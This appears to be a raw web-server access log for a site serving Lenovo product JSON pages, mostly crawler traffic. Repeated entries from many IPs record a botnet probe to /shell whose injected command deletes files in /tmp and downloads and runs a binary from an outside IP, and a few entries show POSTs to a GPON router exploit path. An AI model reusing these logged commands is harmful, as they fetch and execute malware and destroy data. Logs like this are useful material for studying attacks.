162.159.108.82 - - [03/Jun/2026:12:07:20 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.68 - - [03/Jun/2026:12:07:20 +0800] "GET /index.php/lenovo/json/IDEACENTRE-AIO-3-22ADA05/ HTTP/1.1" 200 1730 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
139.135.222.67 - - [03/Jun/2026:12:41:39 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [03/Jun/2026:12:49:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.82 - - [03/Jun/2026:12:56:06 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.110.55 - - [03/Jun/2026:12:56:07 +0800] "GET /index.php/lenovo/json/LENOVO-300-WIRELESS-COMPACT-KEYBOARD/ HTTP/1.1" 200 362 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:13:11:45 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.68.119.7 - - [03/Jun/2026:13:11:46 +0800] "GET /index.php/lenovo/json/S22E-20/ HTTP/1.1" 200 551 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.68 - - [03/Jun/2026:13:15:36 +0800] "GET /index.php/lenovo/json/LENOVO-45W-USB-C-AC-PORTABLE-ADAPTER/ HTTP/1.1" 200 370 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.49.200 - - [03/Jun/2026:13:19:19 +0800] "GET /index.php/lenovo/json/AIO-3-27ITL6/ HTTP/1.1" 200 2072 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:13:42:53 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.82 - - [03/Jun/2026:14:22:12 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.222.99 - - [03/Jun/2026:14:22:13 +0800] "GET /index.php/lenovo/json/LEGION-Y740S-15IMH/ HTTP/1.1" 200 2233 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:15:02:03 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.68.119.7 - - [03/Jun/2026:15:02:04 +0800] "GET /index.php/lenovo/json/700-ULTRAPORTABLE-BLUETOOTH-SPEAKER/ HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.21 - - [03/Jun/2026:15:05:59 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
162.159.108.68 - - [03/Jun/2026:15:06:25 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
172.64.213.8 - - [03/Jun/2026:15:06:54 +0800] "GET /test_404_page/ HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
172.64.215.117 - - [03/Jun/2026:15:07:57 +0800] "GET //favicon.ico HTTP/1.1" 404 583 "-" "python-requests/2.23.0"
162.159.108.82 - - [03/Jun/2026:15:42:34 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.158.119.176 - - [03/Jun/2026:15:42:35 +0800] "GET /index.php/lenovo/json/IDEAPAD-3-15IGL05/ HTTP/1.1" 200 2144 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:15:50:22 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.110.54 - - [03/Jun/2026:15:50:23 +0800] "GET /index.php/lenovo/json/510A-15ICK/ HTTP/1.1" 200 2668 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:16:28:00 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.9 - - [03/Jun/2026:16:28:01 +0800] "GET /index.php/lenovo/json/LEGION-H500-PRO-7-1-SURROUND-SOUND-GAMING-HEADSET/ HTTP/1.1" 200 394 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [03/Jun/2026:16:47:32 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.9 - - [03/Jun/2026:16:47:33 +0800] "GET /index.php/lenovo/json/YOGA-S740-15IRH/ HTTP/1.1" 200 2174 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
41.242.160.33 - - [03/Jun/2026:16:54:48 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
212.252.39.103 - - [03/Jun/2026:16:57:10 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
136.158.33.56 - - [03/Jun/2026:17:24:28 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
188.55.216.171 - - [03/Jun/2026:17:46:56 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
194.124.36.198 - - [03/Jun/2026:18:16:29 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.82 - - [03/Jun/2026:18:43:45 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.158.119.175 - - [03/Jun/2026:18:43:46 +0800] "GET /index.php/lenovo/json/YOGA-C640-13IML-LTE/ HTTP/1.1" 200 2155 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
103.28.114.71 - - [03/Jun/2026:18:50:38 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
170.150.44.76 - - [03/Jun/2026:19:02:00 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
143.105.233.102 - - [03/Jun/2026:19:11:38 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
172.64.213.9 - - [03/Jun/2026:19:19:47 +0800] "GET / HTTP/1.1" 499 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.159.108.83 - - [03/Jun/2026:20:15:21 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.116 - - [03/Jun/2026:20:15:22 +0800] "GET /favicon.ico HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)"
172.70.223.159 - - [03/Jun/2026:20:20:05 +0800] "GET /index.php/lenovo/json/THINKVISION-P24H-20/ HTTP/1.1" 200 825 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.213.8 - - [03/Jun/2026:20:25:05 +0800] "GET /index.php/lenovo/json/THINKSMART-CAM/ HTTP/1.1" 200 627 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
102.0.14.18 - - [03/Jun/2026:20:40:16 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [03/Jun/2026:20:52:09 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.8.87 - - [03/Jun/2026:20:52:10 +0800] "GET /index.php/lenovo/json/D22E-20/ HTTP/1.1" 200 323 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.24.44 - - [03/Jun/2026:20:54:39 +0800] "GET /index.php/lenovo/json/LEGION-5-15ACH6A/ HTTP/1.1" 200 2026 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [03/Jun/2026:20:59:10 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.223.159 - - [03/Jun/2026:21:00:09 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.83 - - [03/Jun/2026:21:27:51 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.64.215.69 - - [03/Jun/2026:21:27:52 +0800] "GET /index.php/lenovo/json/IDEAPAD-5-PRO-16ACH6/ HTTP/1.1" 200 2026 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [03/Jun/2026:21:59:20 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.222.99 - - [03/Jun/2026:22:41:59 +0800] "GET / HTTP/1.1" 200 12727 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.158.119.175 - - [03/Jun/2026:22:45:31 +0800] "GET / HTTP/1.1" 200 12727 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
143.44.169.114 - - [03/Jun/2026:22:50:02 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 404 1142 "-" "terrabot-owned-you"
196.75.75.57 - - [04/Jun/2026:00:55:12 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
41.73.98.36 - - [04/Jun/2026:00:57:22 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 404 1142 "-" "terrabot-owned-you"
89.211.90.201 - - [04/Jun/2026:01:59:00 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
199.250.152.205 - - [04/Jun/2026:02:57:55 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
191.243.242.2 - - [04/Jun/2026:04:34:04 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
45.232.88.183 - - [04/Jun/2026:07:29:53 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.83 - - [04/Jun/2026:07:53:11 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.69 - - [04/Jun/2026:07:53:16 +0800] "GET /index.php/lenovo/json/LENOVO-G27Q-20/ HTTP/1.1" 200 567 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [04/Jun/2026:07:58:00 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
212.81.54.94 - - [04/Jun/2026:08:17:32 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
172.68.119.8 - - [04/Jun/2026:08:53:57 +0800] "GET /index.php/lenovo/json/THINKCENTRE-M828Z/ HTTP/1.1" 200 1563 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
186.158.200.242 - - [04/Jun/2026:08:55:20 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
179.232.238.103 - - [04/Jun/2026:08:56:00 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
179.0.183.245 - - [04/Jun/2026:09:23:47 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 404 1142 "-" "terrabot-owned-you"
143.44.185.240 - - [04/Jun/2026:10:03:30 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.158.119.176 - - [04/Jun/2026:10:17:54 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
160.25.242.24 - - [04/Jun/2026:10:25:58 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.82 - - [04/Jun/2026:10:32:09 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.82 - - [04/Jun/2026:10:52:41 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [04/Jun/2026:11:14:34 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.158.119.175 - - [04/Jun/2026:11:15:02 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [04/Jun/2026:11:58:49 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Lanai)"
172.70.123.175 - - [04/Jun/2026:11:58:51 +0800] "GET /lenovo/json/IDEAPAD-Z580 HTTP/1.1" 200 3397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Lanai)"
162.159.108.83 - - [04/Jun/2026:12:02:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Gort)"
162.159.108.83 - - [04/Jun/2026:14:46:32 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [04/Jun/2026:15:41:17 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.82 - - [04/Jun/2026:17:22:01 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [04/Jun/2026:19:36:05 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
136.158.64.142 - - [04/Jun/2026:20:04:56 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
162.159.108.82 - - [04/Jun/2026:20:23:48 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.8.87 - - [04/Jun/2026:20:23:51 +0800] "GET /index.php/lenovo/json/IDEAPAD-GAMING-3-15IHU6/ HTTP/1.1" 200 2299 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.24.45 - - [04/Jun/2026:20:51:45 +0800] "GET /index.php/lenovo/json/THINKSMART-CORE-FULL-ROOM-KIT-ZOOM/ HTTP/1.1" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
131.222.250.109 - - [05/Jun/2026:00:34:05 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
172.64.215.69 - - [05/Jun/2026:00:38:55 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
160.191.208.112 - - [05/Jun/2026:04:56:11 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 583 "-" "Hello, World"
162.159.108.83 - - [05/Jun/2026:06:23:55 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Gort)"
162.159.108.83 - - [05/Jun/2026:06:37:46 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [05/Jun/2026:10:12:03 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
153.117.15.186 - - [05/Jun/2026:10:44:05 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 583 "-" "Hello, World"
162.159.110.112 - - [05/Jun/2026:13:25:22 +0800] "GET /lenovo/json/IDEAPAD-Z580 HTTP/1.1" 200 3397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.159.108.83 - - [05/Jun/2026:15:28:37 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [05/Jun/2026:16:14:02 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.123.175 - - [05/Jun/2026:16:22:36 +0800] "GET /index.php/lenovo/json/THINKPAD-THUNDERBOLT-3-WORKSTATION-DOCK/ HTTP/1.1" 200 679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [05/Jun/2026:16:57:49 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.8.86 - - [05/Jun/2026:16:57:50 +0800] "GET /index.php/lenovo/json/THINKVISION-S28U-10/ HTTP/1.1" 200 581 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.82 - - [05/Jun/2026:18:33:36 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.71.8.87 - - [05/Jun/2026:18:33:37 +0800] "GET /index.php/lenovo/json/THINKVISION-T24M-20/ HTTP/1.1" 200 696 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.110.112 - - [05/Jun/2026:22:45:17 +0800] "GET /index.php/lenovo/json/V14-G2-ITL/ HTTP/1.1" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.69 - - [05/Jun/2026:22:50:58 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.83 - - [05/Jun/2026:22:51:28 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.213.9 - - [05/Jun/2026:22:52:13 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.213.9 - - [05/Jun/2026:22:53:01 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.176 - - [05/Jun/2026:22:53:36 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.70.123.175 - - [05/Jun/2026:22:55:05 +0800] "GET /index.php/lenovo/json/EPC300/ HTTP/1.1" 200 1815 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.175 - - [06/Jun/2026:00:08:41 +0800] "GET / HTTP/1.1" 499 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.159.108.82 - - [06/Jun/2026:00:20:42 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [06/Jun/2026:00:32:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Gort)"
172.68.119.8 - - [06/Jun/2026:00:58:33 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
172.71.24.44 - - [06/Jun/2026:01:17:58 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.4111.1405 Mobile Safari/537.36"
162.159.108.82 - - [06/Jun/2026:01:19:12 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.71.24.44 - - [06/Jun/2026:01:21:40 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.9956.1970 Mobile Safari/537.36"
172.70.123.197 - - [06/Jun/2026:01:22:29 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.7744.1028 Mobile Safari/537.36"
172.70.49.201 - - [06/Jun/2026:02:15:03 +0800] "GET / HTTP/1.1" 499 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
162.159.108.82 - - [06/Jun/2026:02:38:31 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
